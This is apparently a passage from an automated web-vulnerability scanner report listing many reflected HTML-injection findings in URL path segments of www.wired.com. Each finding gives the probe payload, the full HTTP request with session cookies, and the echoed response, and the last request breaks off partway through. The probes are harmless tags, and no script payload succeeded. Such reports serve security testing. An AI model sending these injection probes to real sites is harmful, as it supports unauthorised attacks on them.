<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science1aa58"><a>4fd1e10ab82 ss_discoveries c_news">
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68e2b"><a>c26500463e9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries68e2b"><a>c26500463e9/news/2007/11/dayintech_1105 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:00 GMT
Date: Sun, 21 Nov 2010 23:10:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries68e2b"><a>c26500463e9 c_news">
...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 106cc"><a>40e21ea45df was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news106cc"><a>40e21ea45df/2007/11/dayintech_1105 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:21 GMT
Date: Sun, 21 Nov 2010 23:10:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news106cc"><a>40e21ea45df">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b3f5"><a>0ed0fcf84fd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science2b3f5"><a>0ed0fcf84fd/discoveries/news/2007/11/dayintech_1112 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:30 GMT
Date: Sun, 21 Nov 2010 23:09:30 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science2b3f5"><a>0ed0fcf84fd ss_discoveries c_news">
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad12b"><a>fc633443f33 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriesad12b"><a>fc633443f33/news/2007/11/dayintech_1112 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:53 GMT
Date: Sun, 21 Nov 2010 23:09:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriesad12b"><a>fc633443f33 c_news">
...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 483e8"><a>03a3277457 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news483e8"><a>03a3277457/2007/11/dayintech_1112 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:11 GMT
Date: Sun, 21 Nov 2010 23:10:11 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news483e8"><a>03a3277457">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdf3d"><a>d84d2d33c95 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sciencecdf3d"><a>d84d2d33c95/discoveries/news/2007/11/dayintech_1119 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:26 GMT
Date: Sun, 21 Nov 2010 23:09:26 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_sciencecdf3d"><a>d84d2d33c95 ss_discoveries c_news">
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5c14"><a>76302bf60a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriese5c14"><a>76302bf60a4/news/2007/11/dayintech_1119 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:49 GMT
Date: Sun, 21 Nov 2010 23:09:49 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriese5c14"><a>76302bf60a4 c_news">
...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b016"><a>8b57ac5dea6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news4b016"><a>8b57ac5dea6/2007/11/dayintech_1119 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:07 GMT
Date: Sun, 21 Nov 2010 23:10:07 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news4b016"><a>8b57ac5dea6">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d4ab"><a>01007bb9cc7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science9d4ab"><a>01007bb9cc7/discoveries/news/2007/11/dayintech_1127 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:37 GMT
Date: Sun, 21 Nov 2010 23:09:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science9d4ab"><a>01007bb9cc7 ss_discoveries c_news">
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a068"><a>8c766f25078 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries5a068"><a>8c766f25078/news/2007/11/dayintech_1127 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:03 GMT
Date: Sun, 21 Nov 2010 23:10:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries5a068"><a>8c766f25078 c_news">
...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70d5e"><a>47d8c564ba0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news70d5e"><a>47d8c564ba0/2007/11/dayintech_1127 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:24 GMT
Date: Sun, 21 Nov 2010 23:10:24 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news70d5e"><a>47d8c564ba0">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58f65"><a>a1751845344 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science58f65"><a>a1751845344/discoveries/news/2007/11/wiredscience HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:23 GMT
Date: Sun, 21 Nov 2010 23:09:23 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science58f65"><a>a1751845344 ss_discoveries c_news">
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 995c5"><a>fe13073f8eb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries995c5"><a>fe13073f8eb/news/2007/11/wiredscience HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:40 GMT
Date: Sun, 21 Nov 2010 23:09:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries995c5"><a>fe13073f8eb c_news">
...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9994"><a>6e128528801 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/newse9994"><a>6e128528801/2007/11/wiredscience HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:58 GMT
Date: Sun, 21 Nov 2010 23:09:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_newse9994"><a>6e128528801">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb7bd"><a>1e8eec37d12 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sciencebb7bd"><a>1e8eec37d12/discoveries/news/2007/12/dayintech_1217 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:07 GMT
Date: Sun, 21 Nov 2010 23:11:07 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_sciencebb7bd"><a>1e8eec37d12 ss_discoveries c_news">
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d62a"><a>5c65a610 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries6d62a"><a>5c65a610/news/2007/12/dayintech_1217 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29315
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:23 GMT
Date: Sun, 21 Nov 2010 23:11:23 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries6d62a"><a>5c65a610 c_news">
...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43dd8"><a>9084cb4edf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news43dd8"><a>9084cb4edf/2007/12/dayintech_1217 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:33 GMT
Date: Sun, 21 Nov 2010 23:11:33 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news43dd8"><a>9084cb4edf">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 266e8"><a>afe4e6938d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science266e8"><a>afe4e6938d/discoveries/news/2008/02/dayintech_0226 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
